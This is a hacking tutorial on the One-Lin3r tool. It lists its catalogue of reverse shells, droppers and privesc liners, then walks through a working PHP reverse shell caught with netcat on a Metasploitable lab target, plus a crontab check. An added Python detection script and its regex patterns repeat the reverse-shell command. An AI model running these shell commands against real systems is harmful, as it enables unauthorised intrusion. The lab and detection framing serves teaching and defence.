How To: Use One-Lin3r to Quickly Generate Reverse Shells, Privesc Commands & More


A lot of time can be wasted performing trivial tasks over and over again, and it's especially true when it comes to hacking and penetration testing. Trying different shells to own a target, and testing out privilege escalation commands afterward, can eat up a lot of time. Fortunately, there is a tool called One-Lin3r that can quickly generate shells, privesc commands, and more.

One-Lin3r is a Python tool that acts as a framework to automate the generation of one-liners commonly used in pentesting and hacking. Its usage is very similar to Metasploit, so it's natural and simple to pick up for most people. The tool contains features such as auto-complete, search suggestion, automatic copying, and smart searching, making it a breeze to find whatever you're looking for.

In this tutorial, we will be using Metasploitable 2 as the target and Kali Linux as our local machine. You can use a similar setup to follow along.

Installing & Basic Usage

The first thing we need to do is install One-Lin3r. It requires Python 3, so the easiest way to do this is with pip3. It will install the tool along with any dependencies it may need.

~# pip3 install one-lin3r

Collecting one-lin3r
  Downloading https://files.pythonhosted.org/packages/87/bc/603e4262e3e268e0e2ff54f7f87bbc638f5c4356f893396e2575379bc0cb/one_lin3r-2.0-py3-none-any.whl (100kB)
    100% |████████████████████████████████| 102kB 1.4MB/s
Collecting terminaltables (from one-lin3r)
  Downloading https://files.pythonhosted.org/packages/9b/c4/4a21174f32f8a7e1104798c445dacdc1d4df86f2f26722767034e4de4bff/terminaltables-3.1.0.tar.gz
Requirement already satisfied: pyperclip in /usr/lib/python3/dist-packages (from one-lin3r) (1.6.4)
Requirement already satisfied: prompt-toolkit in /usr/local/lib/python3.7/dist-packages (from one-lin3r) (2.0.9)
Requirement already satisfied: wcwidth in /usr/local/lib/python3.7/dist-packages (from prompt-toolkit->one-lin3r) (0.1.7)
Requirement already satisfied: six>=1.9.0 in /usr/lib/python3/dist-packages (from prompt-toolkit->one-lin3r) (1.12.0)
Installing collected packages: terminaltables, one-lin3r
  Running setup.py install for terminaltables ... done
Successfully installed one-lin3r-2.0 terminaltables-3.1.0

We can run the basic help menu by tacking on the -h flag:

~# one-lin3r -h

usage: One-Lin3r.py [-h] [-r R] [-x X] [-q]

optional arguments:
  -h, --help  show this help message and exit
  -r R        Execute a resource file.
  -x X        Execute a specific command (use ; for multiples).
  -q          Quiet mode (no banner).

One-Lin3r is a framework, so to really get into it, we need to start it up. Simply type one-lin3r in the terminal to do so:

~# one-lin3r

               zeeeeee-
              z$$$$$$"
             d$$$$$$"
            d$$$$$P
           d$$$$$P
          $$$$$$"
        .$$$$$$"
       .$$$$$$"
      4$$$$$$$$$$$$$"
     z$$$$$$$$$$$$$"
     """""""3$$$$$"
           z$$$$P
          d$$$$"        One-Lin3r By D4Vinci - V2.0
        .$$$$$"           A framework where all your liners belongs to...
       z$$$$$"              Loaded 155 liner(s).
      z$$$$P
     d$$$$$$$$$$"
    *******$$$"
         .$$$"
        .$$"
       4$P"
      z$"
     zP
    z"
   /
  ^

OneLiner >

Once it starts, we're greeted with a banner, much like what happens when starting the Metasploit Framework. In fact, most of the commands and usage of this tool are very similar to Metasploit, so most of us should feel right at home.

Typing help or ? will give us the detailed help menu:

OneLiner > ?

    Command                 Description
    --------                -------------
    help/?                  Show this help menu.
    list/show               List all one-liners in the database.
    search   [Keywords..]   Search database for a specific liner by its name, author name or description.
    use       <liner>       Use an available one-liner.
    copy      <liner>       Use an available one-liner and copy it to clipboard automatically.
    info      <liner>       Get information about an available liner.
    set <variable> <value>  Sets a context-specific variable to a value to use while using one-liners.
    variables               Prints all previously specified variables.
    banner                  Display banner.
    reload/refresh          Reload the liners database.
    check                   Prints the core version and checks if you are up-to-date.
    history                 Display command-line most important history from the beginning.
    makerc                  Save command-line history to a file.
    resource    <file>      Run the commands stored in a file
    os         <command>    Execute a system command without closing the framework
    exit/quit               Exit the framework

Since we are restricted to the framework prompt while running One-Lin3r, it's useful to be able to run operating system commands while working. Use the os keyword followed by whatever command you wish to run to do this:

OneLiner > os uname -a

Linux drd 4.19.0-kali5-amd64 #1 SMP Debian 4.19.37-5kali1 (2019-06-20) x86_64 GNU/Linux

We can use the list command to display all of the available one-liners the tool has to offer. It will list the names and associated functions of each one.

OneLiner > list

 #   | Name                                                        | Function
-----+-------------------------------------------------------------+---------------
 1   | multi/nmap/slowloris_attack                                 | Nmap script
 2   | multi/nmap/google_malware_check                             | Nmap script
 3   | multi/nmap/http_enumerate                                   | Nmap script
 4   | multi/nmap/full_vulnerability_scan                          | Nmap script
 5   | multi/nmap/common_malware_scan                              | Nmap script
 6   | multi/nmap/ftp_bruteforce                                   | Nmap script
 7   | openbsd/nc/bind_udp                                         | Bind Shell
 8   | openbsd/nc/reverse_tcp                                      | Reverse Shell
 9   | openbsd/bash/read_doas_config                               | PrivEsc
 10  | windows/scan/check_netapi                                   | Nmap script
 11  | windows/scan/check_eternal_blue                             | Nmap script
 12  | windows/python/bind_udp                                     | Bind Shell
 13  | windows/python/bind_tcp                                     | Bind Shell
 14  | windows/python/reverse_tcp                                  | Reverse Shell
 15  | windows/python/reverse_tcp_threaded                         | Reverse Shell
 16  | windows/php/bind_udp                                        | Bind Shell
 17  | windows/php/bind_tcp                                        | Bind Shell
 18  | windows/powershell/meterpreter_shell                        | Reverse Shell
 19  | windows/powershell/get_iis_config                           | PrivEsc
 20  | windows/powershell/bind_tcp                                 | Bind Shell
 21  | windows/powershell/ps1_dropper_microsoft_syncappv           | Dropper
 22  | windows/powershell/list_installed_programs_using_registry   | PrivEsc
 23  | windows/powershell/reverse_tcp                              | Reverse Shell
 24  | windows/powershell/setup_powerup_powertools                 | PrivEsc
 25  | windows/powershell/ps1_dropper                              | Dropper
 26  | windows/powershell/list_unqouted_services                   | PrivEsc
 27  | windows/powershell/get_saved_wifi_passwords                 | PrivEsc
 28  | windows/powershell/get_passwords_from_memory_using_mimikatz | PrivEsc
 29  | windows/powershell/setup_keylogger_powersploit              | Keylogger
 30  | windows/powershell/list_running_processes                   | PrivEsc
 31  | windows/powershell/ps1_dropper_rundll32                     | Dropper
 32  | windows/powershell/list_scheduled_tasks                     | PrivEsc
 33  | windows/powershell/setup_session_gopher                     | PrivEsc
 34  | windows/powershell/reverse_tcp_string                       | Reverse Shell
 35  | windows/powershell/list_installed_programs_using_folders    | PrivEsc
 36  | windows/groovysh/reverse_tcp                                | Reverse Shell
 37  | windows/cmd/bat_dropper                                     | Dropper
 38  | windows/cmd/hta_dropper_mshta                               | Dropper
 39  | windows/cmd/list_logon_requirements                         | PrivEsc
 40  | windows/cmd/dll_dropper_rundll32                            | Dropper
 41  | windows/cmd/read_registry_vnc_passwords                     | PrivEsc
 42  | windows/cmd/read_registry_snmp_key                          | PrivEsc
 43  | windows/cmd/read_registry_run_key                           | PrivEsc
 44  | windows/cmd/read_registry_winlogon_key                      | PrivEsc
 45  | windows/cmd/read_registry_r_key                             | PrivEsc
 46  | windows/cmd/list_routing_tables                             | PrivEsc
 47  | windows/cmd/exe_dropper_certutil                            | Dropper
 48  | windows/cmd/list_startup_folder_currentuser                 | PrivEsc
 49  | windows/cmd/search_registry_for_passwords_cu                | PrivEsc
 50  | windows/cmd/list_network_interfaces                         | PrivEsc
 51  | windows/cmd/sct_dropper_rundll32                            | Dropper
 52  | windows/cmd/get_saved_wifi_aps_ssid                         | PrivEsc
 53  | windows/cmd/list_users                                      | PrivEsc
 54  | windows/cmd/read_registry_putty_sessions                    | PrivEsc
 55  | windows/cmd/get_systeminfo                                  | PrivEsc
 56  | windows/cmd/dll_dropper_regasm                              | Dropper
 57  | windows/cmd/list_startup_tasks_with_wmic                    | PrivEsc
 58  | windows/cmd/search_registry_for_passwords_lm                | PrivEsc
 59  | windows/cmd/execute_c#_files                                | Execute
 60  | windows/cmd/list_user_privileges                            | PrivEsc
 61  | windows/cmd/list_network_shares                             | PrivEsc
 62  | windows/cmd/search_for_passwords                            | PrivEsc
 63  | windows/cmd/read_services_with_tasklist                     | PrivEsc
 64  | windows/cmd/runas_with_creds                                | Execute
 65  | windows/cmd/list_unqouted_services                          | PrivEsc
 66  | windows/cmd/read_services_with_wmic                         | PrivEsc
 67  | windows/cmd/list_current_connections                        | PrivEsc
 68  | windows/cmd/get_saved_wifi_passwords                        | PrivEsc
 69  | windows/cmd/sct_dropper_mshta                               | Dropper
 70  | windows/cmd/read_registry_runonce_key                       | PrivEsc
 71  | windows/cmd/dll_dropper_certutil_base64                     | Dropper
 72  | windows/cmd/msi_quiet_installer                             | Execute
 73  | windows/cmd/list_startup_folder_allusers                    | PrivEsc
 74  | windows/cmd/sct_dropper_regsvr32                            | Dropper
 75  | windows/cmd/list_drives                                     | PrivEsc
 76  | windows/cmd/msi_dropper_wininstaller                        | Dropper
 77  | windows/cmd/list_installed_updates                          | PrivEsc
 78  | windows/cmd/list_localgroups                                | PrivEsc
 79  | windows/cmd/list_running_processes                          | PrivEsc
 80  | windows/cmd/read_firewall_config                            | PrivEsc
 81  | windows/cmd/list_arp_tables                                 | PrivEsc
 82  | windows/cmd/xsl_dropper_wmic                                | Dropper
 83  | windows/cmd/list_scheduled_tasks                            | PrivEsc
 84  | windows/cmd/execute_over_forfiles                           | Execute
 85  | windows/cmd/list_processes_running_as_system                | PrivEsc
 86  | windows/cmd/read_registry_always_install_elevated_key_cu    | PrivEsc
 87  | windows/cmd/exe_dropper_bitsadmin                           | Dropper
 88  | windows/cmd/dll_loader_control_panel                        | Loader
 89  | windows/cmd/win_remote_management                           | Execute
 90  | windows/cmd/dll_loader_word                                 | Loader
 91  | windows/cmd/read_registry_always_install_elevated_key_lm    | PrivEsc
 92  | windows/cmd/get_snmp_config                                 | PrivEsc
 93  | windows/cmd/get_architecture                                | PrivEsc
 94  | windows/nc/bind_tcp                                         | Bind Shell
 95  | windows/nc/reverse_tcp                                      | Reverse Shell
 96  | windows/lua/reverse_tcp                                     | Reverse Shell
 97  | windows/perl/bind_udp                                       | Bind Shell
 98  | windows/perl/bind_tcp                                       | Bind Shell
 99  | windows/perl/reverse_tcp                                    | Reverse Shell
 100 | windows/ruby/bind_udp                                       | Bind Shell
 101 | windows/ruby/bind_tcp                                       | Bind Shell
 102 | windows/ruby/reverse_tcp                                    | Reverse Shell
 103 | linux/awk/bind_tcp                                          | Bind Shell
 104 | linux/awk/reverse_tcp                                       | Reverse Shell
 105 | linux/awk/reverse_udp                                       | Reverse Shell
 106 | linux/java/reverse_tcp                                      | Reverse Shell
 107 | linux/go/reverse_tcp                                        | Reverse Shell
 108 | linux/python/bind_udp                                       | Bind Shell
 109 | linux/python/bind_tcp                                       | Bind Shell
 110 | linux/python/reverse_tcp                                    | Reverse Shell
 111 | linux/python/reverse_tcp_interactive                        | Reverse Shell
 112 | linux/python/reverse_udp                                    | Reverse Shell
 113 | linux/php/bind_udp                                          | Bind Shell
 114 | linux/php/bind_tcp                                          | Bind Shell
 115 | linux/php/reverse_tcp                                       | Reverse Shell
 116 | linux/openssl/reverse_tcp                                   | Reverse Shell
 117 | linux/ncat/reverse_tcp_ssl                                  | Reverse Shell
 118 | linux/ncat/reverse_tcp                                      | Reverse Shell
 119 | linux/ncat/reverse_udp                                      | Reverse Shell
 120 | linux/socat/bind_udp                                        | Bind Shell
 121 | linux/socat/reverse_tcp                                     | Reverse Shell
 122 | linux/tclsh/reverse_tcp                                     | Reverse Shell
 123 | linux/nodejs/reverse_tcp                                    | Reverse Shell
 124 | linux/nc/reverse_tcp_mkfifo                                 | Reverse Shell
 125 | linux/nc/bind_tcp                                           | Bind Shell
 126 | linux/nc/reverse_tcp_mknod                                  | Reverse Shell
 127 | linux/nc/bind_tcp_mkfifo                                    | Bind Shell
 128 | linux/nc/reverse_tcp                                        | Reverse Shell
 129 | linux/nc/reverse_udp                                        | Reverse Shell
 130 | linux/lua/reverse_tcp                                       | Reverse Shell
 131 | linux/lua/reverse_tcp_bash                                  | Reverse Shell
 132 | linux/perl/bind_udp                                         | Bind Shell
 133 | linux/perl/reverse_udp_miosocket                            | Reverse Shell
 134 | linux/perl/bind_tcp                                         | Bind Shell
 135 | linux/perl/reverse_tcp                                      | Reverse Shell
 136 | linux/perl/reverse_tcp_miosocket                            | Reverse Shell
 137 | linux/telnet/reverse_tcp_mkfifo                             | Reverse Shell
 138 | linux/telnet/reverse_tcp_mknod                              | Reverse Shell
 139 | linux/ruby/bind_udp                                         | Bind Shell
 140 | linux/ruby/bind_tcp                                         | Bind Shell
 141 | linux/ruby/reverse_tcp                                      | Reverse Shell
 142 | linux/bash/list_cronjobs_for_another_user                   | PrivEsc
 143 | linux/bash/list_cronjobs_for_current_user                   | PrivEsc
 144 | linux/bash/list_all_capabilities                            | PrivEsc
 145 | linux/bash/reverse_tcp                                      | Reverse Shell
 146 | linux/bash/exploit_docker_bash_container                    | PrivEsc
 147 | linux/bash/search_for_password_using_grep                   | PrivEsc
 148 | linux/bash/search_for_password_using_find                   | PrivEsc
 149 | linux/bash/search_for_password_in_memory                    | PrivEsc
 150 | linux/bash/exploit_writeable_sudoers                        | PrivEsc
 151 | linux/bash/find_suid                                        | PrivEsc
 152 | linux/bash/reverse_tcp_exec                                 | Reverse Shell
 153 | linux/bash/list_cronjobs_for_all_users                      | PrivEsc
 154 | linux/bash/list_systemd_timers                              | PrivEsc
 155 | linux/bash/get_last_edited_files                            | PrivEsc

We can also search for specific items using the search command. This is something that One-Lin3r is really good at. It not only has auto-complete capabilities, but it also knows what you are trying to search for by offering suggestions and allowing partial search terms.

For instance, let's say we wanted some kind of PHP shell for Linux. We don't need to type the full path for the tool to find what we are looking for.

OneLiner > search linux php

 #   | Name                  | Function
-----+-----------------------+---------------
 1   | linux/php/bind_udp    | Bind Shell
 2   | linux/php/bind_tcp    | Bind Shell
 3   | linux/php/reverse_tcp | Reverse Shell

We can get information about a specific one-liner with the info command, which will give us a short description of the item, including its author, function, and variables that are used.

OneLiner > info linux/php/reverse_tcp

[+] Liner added by => vesche
[+] Function       => Reverse Shell
[+] Variables used => TARGET, PORT
[+] Description    => Uses PHP sockets & exec to create a reverse shell.

Reverse Shell Example

Once we've found a suitable item, we can load it with the use command:

OneLiner > use linux/php/reverse_tcp

[+] Your liner is: php -r '$sock=fsockopen("TARGET",PORT);exec("/bin/sh -i <&3 >&3 2>&3");'

Once we do this, it will give us the actual line that we need to copy and run. In this example, we can see there are parameters for the target and port. To display current variables and their associated values, simply type variables at the prompt:

OneLiner > variables

 # | Name      | Value
---+-----------+-------
 1 | TARGET    | None
 2 | PORT      | None
 3 | URL       | None
 4 | COMMAND   | None
 5 | FILE_PATH | None
 6 | USERNAME  | None
 7 | PASSWORD  | None

Now we are able to set values for these variables, much like how we do in Metasploit. Since we are generating a reverse shell here, we need to set the target to the IP address of our local machine:

OneLiner > set target 10.10.0.1

[+] Variable target set to 10.10.0.1

And the desired port so it can connect back to our listener:

OneLiner > set port 4321

[+] Variable port set to 4321

Now when we display the variables again, we can see that our values are set:

OneLiner > variables

 # | Name      | Value
---+-----------+-----------
 1 | TARGET    | 10.10.0.1
 2 | PORT      | 4321
 3 | URL       | None
 4 | COMMAND   | None
 5 | FILE_PATH | None
 6 | USERNAME  | None
 7 | PASSWORD  | None

Let's try this out. First, we need to set up a listener so we can catch the incoming connection from the target. Netcat is always a good choice:

~# nc -lvp 4321

listening on [any] 4321 ...

Next, load the one-liner to get the full command. We can see that the target and port variables are now filled in with our values:

OneLiner > use linux/php/reverse_tcp

[+] Your liner is: php -r '$sock=fsockopen("10.10.0.1",4321);exec("/bin/sh -i <&3 >&3 2>&3");'

We could just copy this command like normal, but One-Lin3r actually has a feature to automate this for us. Instead of loading an item with the use command, load it with the copy command — this will automatically copy what we need right to the clipboard:

OneLiner > copy linux/php/reverse_tcp

[+] Your liner is: php -r '$sock=fsockopen("10.10.0.1",4321);exec("/bin/sh -i <&3 >&3 2>&3");'
[+] Liner copied to clipboard successfully!

From here, it's time to exploit the target. Feel free to do this however you want, but command injection is always a favorite of mine. Once we exploit the target and run our reverse shell command, we should see a connection open up on our local machine:

10.10.0.50: inverse host lookup failed: Unknown host
connect to [10.10.0.1] from (UNKNOWN) [10.10.0.50] 56718
sh: no job control in this shell
sh-3.2$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

We can now run commands like id to verify we have compromised a user on the system.

Privesc Example

Now that we have a shell on the system as a limited user, the next step to take would be privilege escalation. Fortunately, One-Lin3r also contains some handy privesc commands for us to generate.

First things first, let's upgrade this shell we have to a fully interactive TTY session so we have more control over what we're doing.

Now that we have a decent shell, let's find a potential privesc command to use. I usually like to work out of a world-writable directory during post-exploitation so I can write and execute whatever I want — /var/tmp is a good bet:

www-data@metasploitable:/var/www/dvwa/vulnerabilities/exec$ cd /var/tmp

Now, back in One-Lin3r, we can search for an appropriate privesc for Linux:

OneLiner > search linux privesc

 #   | Name                                      | Function
-----+-------------------------------------------+----------
 1   | linux/bash/list_cronjobs_for_another_user | PrivEsc
 2   | linux/bash/list_cronjobs_for_current_user | PrivEsc
 3   | linux/bash/list_all_capabilities          | PrivEsc
 4   | linux/bash/exploit_docker_bash_container  | PrivEsc
 5   | linux/bash/search_for_password_using_grep | PrivEsc
 6   | linux/bash/search_for_password_using_find | PrivEsc
 7   | linux/bash/search_for_password_in_memory  | PrivEsc
 8   | linux/bash/exploit_writeable_sudoers      | PrivEsc
 9   | linux/bash/find_suid                      | PrivEsc
 10  | linux/bash/list_cronjobs_for_all_users    | PrivEsc
 11  | linux/bash/list_systemd_timers            | PrivEsc
 12  | linux/bash/get_last_edited_files          | PrivEsc

Let's take a look at this one, which will list any cron jobs for the current user:

OneLiner > info linux/bash/list_cronjobs_for_current_user

[+] Liner added by => Karim shoair (D4Vinci)
[+] Function       => PrivEsc
[+] Variables used => None
[+] Description    => List all crob jobs for current user

Seems pretty straightforward, and we don't even need to set any variables. Use the copy command to copy it straight to the clipboard:

OneLiner > copy linux/bash/list_cronjobs_for_current_user

[+] Your liner is: crontab -l
[+] Liner copied to clipboard successfully!

We can see it still tells us what it generates, but we save an extra step by copying the command automatically. The only thing left to do is run the one-liner on the target:

www-data@metasploitable:/var/tmp$ crontab -l

no crontab for www-data

We can see in this particular instance there are no cron jobs for this user, but One-Lin3r makes it easy to have some common privesc commands right at our fingertips.
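
Seen from the target's side, both examples above leave recognizable process-execution traces: the PHP liner's inline socket code with a shell bound to descriptor 3, and the www-data account running id and crontab -l. The following is an added detection sketch, not part of the original tutorial or of One-Lin3r; it also covers the Python, Perl and Ruby interpreters that appear in the liner list. The JSON event format, SERVICE_ACCOUNTS and ENUM_COMMANDS are assumptions, and the sample events are constructed.

```python
import json
import re

# Constructed process-execution events (one JSON object per line), shaped like
# a post-processed auditd/EDR feed. Values mirror this tutorial's lab hosts.
SAMPLE_EVENTS = r'''
{"host": "metasploitable", "user": "www-data", "parent": "apache2", "cmd": "sh -c ping -c 3 10.10.0.1"}
{"host": "metasploitable", "user": "www-data", "parent": "sh", "cmd": "php -r '$sock=fsockopen(\"10.10.0.1\",4321);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"}
{"host": "metasploitable", "user": "www-data", "parent": "php", "cmd": "/bin/sh -i"}
{"host": "metasploitable", "user": "www-data", "parent": "sh", "cmd": "id"}
{"host": "metasploitable", "user": "www-data", "parent": "sh", "cmd": "crontab -l"}
{"host": "metasploitable", "user": "msfadmin", "parent": "bash", "cmd": "crontab -l"}
{"host": "metasploitable", "user": "root", "parent": "cron", "cmd": "php -r 'echo date(\"c\");'"}
'''

# Assumptions to tune per environment: accounts that should never hold an
# interactive shell, and recon commands worth flagging when they run them.
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx"}
ENUM_COMMANDS = {"id", "whoami", "uname", "crontab"}

# Interpreter given inline code that opens a socket (shape of the PHP liner).
INLINE_SOCKET = re.compile(
    r"\b(?:php\s+-r|python[23]?\s+-c|perl\s+-e|ruby\s+-e)\b.*"
    r"(?:fsockopen|socket\.socket|IO::Socket|TCPSocket)", re.I | re.S)
# Interactive shell whose stdio is redirected to a numbered descriptor (<&3).
SHELL_FD_REDIRECT = re.compile(r"\b(?:ba|da|z)?sh\s+-i\b.*?[<>]&\d", re.S)
# The process itself is an interactive shell, e.g. "/bin/sh -i".
INTERACTIVE_SHELL = re.compile(r"^(?:\S*/)?(?:ba|da|z)?sh\s+-i\b")


def classify(event):
    """Return the names of the rules that fire for one execution event."""
    cmd = event.get("cmd", "")
    user = event.get("user", "")
    hits = []
    if INLINE_SOCKET.search(cmd):
        hits.append("inline_interpreter_socket")
    if SHELL_FD_REDIRECT.search(cmd):
        hits.append("interactive_shell_on_socket_fd")
    if user in SERVICE_ACCOUNTS:
        if INTERACTIVE_SHELL.search(cmd):
            hits.append("service_account_interactive_shell")
        argv = cmd.split()
        # Compare the basename of argv[0] so /usr/bin/id matches as well.
        if argv and argv[0].rsplit("/", 1)[-1] in ENUM_COMMANDS:
            hits.append("service_account_enumeration")
    return hits


def scan(text):
    """Classify every JSON line in text; return (user, cmd, hits) findings."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed lines instead of aborting the scan
        hits = classify(event)
        if hits:
            findings.append((event.get("user", ""), event.get("cmd", ""), hits))
    return findings


if __name__ == "__main__":
    for user, cmd, hits in scan(SAMPLE_EVENTS):
        print(f"{user:10} {', '.join(hits):60} {cmd}")
```

The legitimate web-app ping, the interactive user's crontab -l and root's socket-free php -r produce no findings, which is the baseline these rules need to hold against before they are deployed as alerts.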

Wrapping Up

Today, we explored a tool called One-Lin3r and how to use it to quickly generate shells, privilege escalation commands, and more. We tested it out by using a PHP reverse shell to compromise the target, then tried to escalate privileges by generating a command to check for cron jobs. With an interface that feels familiar to any Metasploit user, One-Lin3r makes it easy to hack on the fly.


Cover image by EVG photos/Pexels; Screenshots by drd_/Null Byte
